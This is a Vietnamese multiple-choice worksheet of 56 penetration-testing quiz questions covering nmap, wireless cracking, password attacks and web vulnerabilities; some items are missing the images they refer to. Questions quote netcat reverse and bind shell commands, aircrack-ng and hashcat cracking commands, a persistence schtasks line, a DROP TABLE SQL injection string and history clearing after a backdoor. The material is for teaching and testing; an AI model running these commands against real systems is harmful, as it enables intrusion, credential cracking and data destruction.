wayground logo

Free Printable Worksheets

NEW

Font size

S
M
L
XL
Worksheets

Tú ĐỤ

Total questions: 56

Worksheet time: 28mins

Name
Class
Date
1.

Sau một số nỗ lực khai thác lỗi từ một trang web mục tiêu đã tạo ra thông báo lỗi như sau. Mô tả đúng nhất về lỗi

a)

Trang web tồn tại lỗ hổng XSS

b)

Trang web tồn tại lỗ hổng SQL injection

c)

Trang web tồn tại lỗ hổng CSRF

d)

Trang web tồn tại lỗ hổng tràn bộ đệm

2.

Trong quá trình kiểm thử hệ thống, Peter muốn tiêm shellcode của mình vào một số chương trình hợp lệ trên hệ thống Window như calc.exe, mspaint.exe để kiểm tra khả năng bypass antivirus. Công cụ nào sau đây được phát triển cho mục đích này?

a)

Meterpreter

b)

Powershell

c)

Shellter

d)

Metasploit

3.

Thuật ngữ nào được sử dụng để môt tả các cuộc tấn công sử dụng kết nối Bluetooth của thiết bị để lấy cắp thông tin?

a)

NFC cloning

b)

Bluesnarfing

c)

BlueBorne

d)

Wardriving

4.

Công cụ nào dưới đây thường được sử dụng để thu thập một số thông tin về máy chủ & ứng dụng web như Platform, Webserver platform, Server headers, Cookie, Type of Script...?

a)

whatweb

b)

OpenVas

c)

wpscan

d)

w3af

5.

Sau khi xâm nhập vào một máy chủ từ xa có địa chỉ 102.15.8.13, Cameron thực hiện câu lệnh sau trên máy chủ từ xa: H31

nc -lvp 4444 -e /bin/bash

Trong trường hợp Cameron muốn tạo bind shell, lệnh nào sau đây cần được thực hiện trên máy tính của anh í?

a)

nc 102.15.8.13 4444

b)

nc -e /bin/bash -lvp 4444

c)

nc -lvp 4444 102.15.8.13

d)

nc 102.15.8.13 -e /bin/bash

6.

Kẻ tấn công lừa người dùng truy cập vào một trang web độc hại thông qua email lừa đảo. Người dùng nhấp vào liên kết email và truy cập trang web độc hại trong khi vẫn duy trì phiên hoạt động được xác thực với ngân hàng của mình. Kẻ tấn công thông qua trang web độc hại đã chỉ thị cho trình duyệt của người dùng gửi yêu cầu đến trang web ngân hàng mà người dùng không hề hay biết. Đây là dạng tấn công nào?

a)

CSRF

b)

Hidden form field

c)

XSS

d)

CSPP( Connection String Parameter Pollution)

7.

Steve đang tham gia kiểm thử xâm nhập một hệ thống của khách hàng và tiến hành thu thập thông tin mà không cần thực hiện dò quét hoặc thực hiện các tấn công thăm dò mục tiêu. Steve đang sử dụng phương pháp thu thập thông tin nào?

a)

Enumeration

b)

Active

c)

OSINT

d)

Port scanning

8.

Trong quá trình kiểm thử mạng không dây, Tom thực hiện câu lệnh như hình dưới đây.

root@xali:~# aircrack-ng -b 12:34:56:78:90:AB /tmp/wpa_output*.cap

Mục đích của Tom trong trường hợp này là gì?

a)

Xác định các mạng hỗ trợ WPS

b)

Xác định thông tin về ESSID của AP mà máy nạn nhân đang kết nối

c)

Bẻ khóa WEP dựa trên gói tin thu được

d)

Thu thập mật khẩu truy cập cho bộ định tuyến hỗ trợ WPS sau bẻ khóa WPS PIN

9.

Jenny thực hiện kiểm thử cho một tổ chức và đã xâm nhập thành công vào một máy chủ Windows. Jenny cố gắng duy trì khả năng kết nối lâu dài tới hệ thống máy tính nạn nhân. Câu lệnh nào dưới đây có khả năng thực hiện việc đó?

a)

net session server | dsquery -user | net use c$

b)

powershell && set-executionpolicy unrestricted

c)

schtasks.exe /create/tr powershell.exe Sv.ps1 /run

d)

req save HKLMSystemCurrentControlSetServicesSv.reg

10.

Trong quá trình thực hiện kiểm thử, Alice đã thu được NetNTLMv2 hash sử dụng Responder. Lệnh nào dưới đây cho phép người kiểm thử bẻ khóa giá trị hash thu được sử dụng tấn công mặt nạ?

a)

hashcat -m 5600 -r rules/bestG4.rule hash.txt wordlist.txt

b)

hashcat -m 5600 hash.txt

c)

hashcat -m 5600 -o results.text hash.txt wordlist.txt

d)

hashcat -m 5600 -a 3 hash.txt ?a?a?a?a?a?a?a?a

11.

_________là cơ sở dữ liệu nào được tạo ra và duy trì bởi MITRE, trong đó nêu chi tiết các kĩ thuật, hành vi kẻ tấn công có thể thực hiện để tấn công các cơ quan, tổ chức.

a)

CWE

b)

CAPEC

c)

ATT&CK

d)

CVE

12.

Lệnh nào sau đây cho phép tìm kiếm các web server chạy IIS tại Việt Nam có mở port 22 khi sử dụng Shodan?

a)

IIS netport:22 country:vn

b)

IIS port:22 geo:vn

c)

IIS os:22 server:vn

d)

IIS port:22 country:vn

13.

Trong quá tình kiểm thử ứng dụng web, Sam đang tạo 1 payload có nội dung như sau:

a)

XSS

b)

SQL injection

c)

Session hijacking

d)

Path traversal ( dcm Tú cứ Ba)

14.

Trong quá trình kiểm thử mạng không dây. Tom có thu được 1 số lượng lớn các gói tin handshake. Lệnh nào dưới đây cho phép bẻ khóa PSK dựa trên gói tin handshake thu được sử dụng tập từ điển cho trước?

a)

airodump-ng -c 1 --bssid E4:6F:13:04:CE:31 -w rockyou.txt

b)

airmon-ng -w rockyou.txt -b <target MAC> <outfile>

c)

hashcat -m 2500 WPA.hccapx rockyou.txt

d)

aircrack-ng -w rockyou.txt -b <target MAC> <outfile>

15.

Trong quá trình dò quét nmap, Casey sử dụng cờ -O để xác định thông tin về hệ điều hành của hệ thống. Quá trình dò quét xác điịnh được thông tin về hệ thống như sau

a)

Ngày hệ thống được vá lần cuối

b)

Thông tin về các bản vá của Linux kernel đã được cài đặt

c)

Hệ thống đang chạy Linux 2.6 kernel trong khoảng giữa .9 và .33

d)

Xác định thông tin về bản phân phối Linux (Linux distribution) được cài đặt trên hệ thống

16.

Trong quá trình kiểm thử xâm nhập, Mary thu thập được một số thông tin xác thực cấp thấp cho máy chủ Linux thông qua tấn công kĩ nghệ xã hội. Sau khi kiểm tra và xác minh các thông tin đăng nhập này, Mary bắt đầu tìm kiếm cách thức thực hiện tấn công leo thang đặc quyền và có phát hiện ra thông tin sau:

a)

Sử dụng SUID/SGID không an toàn

b)

Lạm dụng Sticky bit

c)

Mật khẩu được lưu trữ dưới dạng bản rõ

d)

Quyền truy cập sudo không an toàn

17.

Liam thực hiện kiểm thử cho hệ thống công ty X. Sau khi thực hiện xâm nhập thành công vào hệ thống, cô ấy thực hiện câu lệnh dưới đây trên máy mục tiêu:

nc 10.1.10.1 6666 -e /bin/sh

Liam đang cố gắng thực hiện việc gì

a)

Khởi đông reverse shell sử dụng Netcat

b)

Không có đáp án nào đúng

c)

Chặn bắt lưu lượng trên cổng 6666 sử dụng netcat

d)

Thiết lập bind shell sử dụng netcat

18.

Loại nào sau đây không phải là khung chính được xác định bởi chuẩn IEEE 802.11?

a)

Control frame

b)

Management frame

c)

Beacon frame

d)

Data frame

19.

Phương pháp bẻ khóa mật khẩu nào sau đây mất nhiều thời gian và công sức nhất, trong đó kẻ tấn công cố gắng mọi kết họp có của chữ hoa, chữ thường, chữ cái, số và kí tự đặc biệt?

a)

Rule based-attack

b)

Brute force attack

c)

Dictionary attack

d)

Hybrid Attack

20.

Tom thực hiện quá trình quets cổng một hệ thống và kết quả quét cho thấy 6 cổng TCP đang mở là: 22, 80, 443,513, 631 và 9100, Thiết bị nào sau đây khả nhất

a)

FTP server

b)

SSh server

c)

Webserver

d)

Printer

21.

Sau khi thực hiện xâm nhập vào hệ thống mục tiêu bằng một tài khoản không có đặc quyền, Steve phát hiện ra rằng trên hệ thống mục tiêu có cài đặt nmap. Steve quyết định sử dụng nmap để dò quét các máy chủ khác trong mạng nội bộ. Tùy chọn nào cần được sử dụng để dò quét thành công các máy chủ khác khi sử dụng nmap bằng tài khoản không có đặc quyền mà Steve chếm được?

a)

-oA

b)

-sT

c)

-sV

d)

-u

22.

Đối với kiểm thử xâm nhập được tiến hành từ bên trong mạng nội bộ ( phía sau các giải pháp bảo vệ vành đai như Firewall, IDS/IPS), việc được cung cấp quyền tiếp cận hạn chế có nghĩa gì?

a)

Người kiểm thử được cung cấp tài khoản quản trị

b)

Người kiểm thứ sẽ chỉ được kết nối tới hệ thống đích trong một thời gian giới hạn

c)

Việc truy cập mạng vào các hệ thống hoặc mạng đích sẽ chỉ được phép trong những giờ được được xác định được

d)

Người kiểm thử chỉ được cung cấp kết nối ban đầu tới các hệ thống đích

23.

Trong quá trình kiểm thử, Jack muốn thực hiện dò quét mục tiêu bằng nmap tuy nhiên anh ấy chỉ có quyền ở mức người dùng thông thường. Khi đó, anh ấy nên sử dụng kỹ thuật dò quét nào?

a)

XMAS scanning

b)

NULL scanning

c)

SYN scanning

d)

TCP Connect scanning

24.

Khi sử dụng nmap để dò quét cổng, tùy chọn nào được sử dụng để quét một cổng cụ thể?

a)

--p

b)

-p

c)

-Pn

d)

-ports

25.

Charleen được giao nhiệm vụ tiếp tục quá trình khai thác lỗ hổng trên hệ thống máy chủ Windows 2012. Các thông tin được chuyển giao bao gồm thông tin đăng nhập cấp người dùng trong hệ thống. Mục tiêu của cô ấy là có được quyền quản trị vào hệ thống máy chủ. Charleen đã thu được NTLM hash và muốn thực hiện tấn công pas-the-hash. Công cụ nào có thể được sử dụng trong trường hợp này

a)

Hashcat

b)

CeWL

c)

Hydra

d)

Smbclient

26.

Trong các đáp án dưới đây thì đâu là 1 kiểu tấn công từ chối dịch vụ trong mạng không dây?

a)

Packet injection

b)

Evil twin

c)

Jamming attack

d)

Karma attack

27.

Sau khi xâm nhập được vào hệ thống mục tiêu, Jenny cố gắng thực hiện một số câu lệnh sau:

a)

Writeable service

b)

Application whitelisting

c)

Shell escape

d)

Insecure file permissions

28.

Kỹ thuật kiểm thử nào được thực hiện mà trong đó người kiểm thử không biết bất cứ thông tin nào về hệ thống mục tiêu và mục tiêu cũng không được thông báo trước khi tiến hành kiểm thử?

a)

Unannounced testing

b)

Blind testing

c)

Double blind testing

d)

Announced testing

29.

Khi thực hiện kiểm thử xâm nhập, Charles sử dụng nmap để dò quét hệ thống mục tiêu bằng lệnh sau:

nmap -sT -sV -T2 -p 1-65535 example.com

Sau khi xem quá trình dò quét chạy trong hơn hai giờ đồng hồ, anh ấy nhận ra rằng mình cần phải tối ưu hóa câu lệnh dò quét. Phương án nào dưới đây KHÔNG phải cách hữu ích để tăng tốc độ quét

a)

Chỉ quét UDP để cải thiện tốc độ

b)

Thay đổi mẫu thời gian từ -T2 sang thành -T3 hoặc -T4

c)

Sử dụng danh sách cổng mặc định

d)

Chuyển sang sử dụng SYN scan

30.

Trong kiểm thử mạng không dây, Tom thực hiện câu lệnh như hình dưới đây

a)

Bẻ khóa PSK được sử dụng để kết nối với điểm truy cập không dây

b)

Thu thập lưu lượng truy cập từ AP và lưu vào tập tin PCAP

c)

Lắng nghe các beacon frame để gửi một yêu cầu kết nối tới AP có địa chỉ BSSID 12:34:56:78:AB

d)

Tiến hành tấn công brute force PIN WPS để có được quyền truy cập mật khẩu AP

31.

Renee đang tiến hành một cuộc kiểm thử xâm nhập vầ phats hiện ra bằng chứng cho thấy một trong những hệ thống của công ty khách hàng đã bị tấn công. Renee nên làm gì ngay sau khi xác nhận các nghi ngờ của mình?

a)

Không cần thực hiện thêm hành động nào vi phạm vi công việc của Renee chỉ giới hạn trong việc thực hiển kiểm thử

b)

Báo cáo ngay các thông tin về bằng chứng tấn công cho khách hàng

c)

Ghi lại các chi tiết trong báo cáo kiểm thử xâm nhâp

d)

Khắc phục lỗ hổng cho phép Renee có quyền truy cập

32.

.

a)

Khôi phục mật khẩu WPA từ WPS PIN

b)

Thực hiện tấn công từ chối dịch vụ bằng cách gửi deauthentication frame tới các thiết bị đang kết nối trong mạng không dây

c)

Thiết lập proxy để thực hiên tấn công SSL strip lên các yêu cầu HTTPS

d)

Thu thập thông tin về quá trình bắt tay 4 bước trong mạng không dây

33.

Loại văn bản nào sau đây có giá trị pháp lí thường được sử dụng để tham chiếu cho việc bảo vệ tính bí mật của dữ liệu và các thông tin khác mà người kiểm thử có thể gặp phải?

a)

NDA

b)

SOW

c)

MSA

d)

NIST

34.

Sau khi xâm nhập thành công vào hệ thống mục tiêu và tiến hành cài đặt backdoor, lệnh nào sau đây cho phép người kiểm thử xóa toàn bộ nội dung của phiên làm việc với terminal trên Linux?

a)

rm -f ./history

b)

history -remove

c)

cat history | clear

d)

history -c

35.

Trong quá trình kiểm thử ứng dụng web, Jack phát hiện ra một số lỗ hổng nghiêm trọng. Anh ấy muốn lợi dụng các lỗ hổng này để tạo một tài khoản trái phép. Những tấn công nào dưới đây có thể được liên kết với nhau để dẫn đến việc tạo thành công tài khoản của Jack?

a)

CSRF, Insecure direct object reference

b)

Code injection, Directory traversal

c)

Insecure direct object reference, Code injection

d)

CSRF, Code injection

36.

Norm đang thực hiện kiểm thử xâm nhập một ứng dụng web và muốn điều khiển các tham số đầu vào được gửi đến ứng dụng trước khi nó rời khỏi trình duyệt web. Công cụ nào sau đây có thể giúp Norm thực hiện việc này?

a)

GDB

b)

YASCA

c)

Burpsuite

d)

AFL

37.

Kỹ thuật tấn công web nào dưới đây KHÔNG cho phép kẻ tấn công thực hiện đánh cắp phiên làm việc của người dùng hợp lệ?

a)

CSRF

b)

SQL injection

c)

XSS

d)

Session hijacking

38.

Trong giai đoạn xác định phạm vi của kiểm thử xâm nhập, Lauren được cung cấp dải IP của hệ thống mà cô ấy sẽ kiểm tra cũng như thông tin về những gì hệ thống chạy nhưng không nhận được một sơ đồ mạng đầy đủ. Kỹ thuật kiểm thử nào được sử dụng trong trường hợp này?

a)

Crystal box

b)

Gray box

c)

White box

d)

Black box

39.

Lệnh airmon-ng start wlan0 được sử dụng để thiết lập wireless adapter về chế độ_____.

a)

Crack

b)

Management

c)

Injection

d)

Monitor

40.

Tệp_____ cho phép trình thu thập dữ liệu của công cụ tìm kiếm biết có thể truy cập vào những URL nào trên trang web. Trong đó có thể chứa các thông tin nhạy cảm mà người thực hiện kiểm thử cần quan tâm

a)

robot.txt

b)

secret.txt

c)

index.txt

d)

sitemap.txt

41.

_____là hình thức tấn công bằng mật khẩu được xây dựng dựa trên cuộc tấn công từ điển nhưng thêm các thành phần phổ biến hơn như 1 hoặc ! ở cuối mỗi từ. Phương pháp này được sử dụng để tìm kiếm những điều bất thường trong mật khẩu

a)

Hybrid attack

b)

Rule based-attack

c)

Non-electronic attack

d)

Brute force attack

42.

Các công cụ HULK, LOIC, HOIC và SlowLoris có khả năng tạo ra tấn công nào dưới đây?

a)

Crack password

b)

SMB hash capture

c)

Dos/DDoS

d)

Brute-force SSH

43.

.

a)

SQL Injection

b)

CSRF

c)

SSL downgrade attack

d)

Sesion hijacking

44.

Khi thực hiện tìm thông tin sử dụng Google, lệnh nào dưới đây cho phép tìm kiếm các website có cấu trúc thư mục là /admin có phần mở rộng là .edu.vn

a)

site:edu.vn inurl:/admin

b)

info:/admin filetype:edu.vn

c)

index of /admin site:edu.vn

d)

index of /admin link:edu.vn

45.

Trong quá trình kiểm thử hệ thống máy chủ mục tiêu, Harry phát hiện ra một lỗ hổng và quyết định sử dụng metasploit để thử khai thác lỗ hổng này. Giả sử các mục được điền trước là hợp lệ đối với máy chủ mục tiêu, Harry sẽ cần xác định tùy chọn nào trước khi có thể chạy mo-dun này?

a)

VHOST

b)

SSL

c)

Proxies

d)

RHOST

46.

Công cụ phổ biến nào được sử dụng để khám phá bị động mạng không dây và cung cấp nhiều tính năng tương tự như airodump-ng?

a)

Aircrack-ng

b)

Netstumbler

c)

Kismet

d)

Netsniff

47.

Mike đang tiến hành kiểm thử xâm nhập cho một ứng dụng web và phát hiện ra quá trình đăng nhập của người dùng đang sử dụng phương thức HTTP GET để gửi dữ liệu. Để giảm thiểu rủi ro lộ thông tin nhạy cảm, giải pháp nào sau đây có thể được sử dụng?

a)

Sử dụng HTTP TRACE

b)

Sử dụng HTTP POST

c)

Sử dụng HTTP OPTIONS

d)

Sử dụng HTTP PUT

48.

Khi thực hiện kiểm thử, Peter phát hiện ra có khả năng thực hiện tấn công SQL injection. Khi sử dụng chuỗi lệnh tiêm sau: H51

a)

WHERE Location_City = NY'1 = 1': DROP_TABLE --

b)

DROP TABLE Orders_Pend WHERE ' NY = 1' --

c)

SELECT * FROM Orders_Pend WHERE Location_City = NY';DROP TABLE Orders_Pend --

d)

SELECT * FROM Orders_Pend WHERE ' NY ';DROP_TABLE --

49.

_____là quá trình thu thập thông tin khi tiến hành thực hiện kiểm thử xâm nhập, trong đó có thể áp dụng các kỹ thuật thu thập chủ động hoặc bị động.

a)

Footscanning

b)

Footpainting

c)

Footgathering

d)

Footprinting

50.

Tom đang thực hiện kiểm thử ứng dụng web cho một ngân hàng sử dụng Nikto. Hiện tại, anh ấy muốn thu thập tất cả các yêu cầu ( request) được tạo ra bởi Nikto sử dụng Burp Suite Proxy trên cổng 8080. Lênh nào dưới đây cho phép anh ấy thực hiện việc này?

a)

./nikto.pl -host http://vulnweb.app/ -proxy http://localhost:8080/

b)

./nikto.pl -host http://vulnweb.app/ -useproxy http://localhost:8080/

c)

./nikto.pl -host http://vulnweb.app/ -proxy http://localhost:8080/

d)

./nikto.pl -url http://vulnweb.app/ -proxy http://localhost:8080/

51.

Trong quá trình thu thập và tìm kiếm thông tin của một kiểm thử xâm nhập vào hệ thống khách hàng, Angela đã khôi phục một bức ảnh và muốn kiểm tra, phân tích nó để tìm kiếm các thông tin hữu ích chứ trong metadata. Công cụ nào dưới đây là thích hợp NHẤT để thực hiện việc này?

a)

Nginx

b)

ExifTool

c)

PsTools

d)

Grep

52.

Kiểu tấn công bẻ khóa mật khẩu nào dưới đây chỉ có thể được thực hiện theo hình thức " Tấn công chủ động"?

a)

Dictionary attack

b)

Hash injection attack

c)

Brute force attack

d)

MiTM

53.

Wendy đang thực hiện một cuộc tấn công chiếm quyền điều khiển phiên. Wendy cần có được thông tin nào để có thể đảm bảo rằng cuộc tấn công của cô ấy sẽ thành công?

a)

Service ticket

b)

Session cookie

c)

Session ticket

d)

Username

54.

Trong quá trình dò quét cổng, dựa vào thông tin dưới đay ta có thể kết luận điều gì về kỹ thuật scan được sử dụng và trạng thái cổng được dò quét?

a)

XMAS scan được sử dụng, cổng đóng

b)

NULL scan được sử dụng, cổng đóng

c)

NULL scan được sử dụng, cổng mở

d)

IDLE scan được sử dụng, cổng mở

55.

Công cụ nào dưới đây KHÔNG có khả năng dò quét lỗ hổng ứng dụng web?

a)

WebInspect

b)

WFuzz

c)

Recon-ng

d)

Acunetix

56.

Thông tin nào KHÔNG thể thu thập được thông qua kỹ thuật footprint?

a)

Thông tin địa chỉ email

b)

Số điện thoại

c)

Thông tin địa chỉ IP

d)

Sơ đồ kiến trúc mạng nội bộ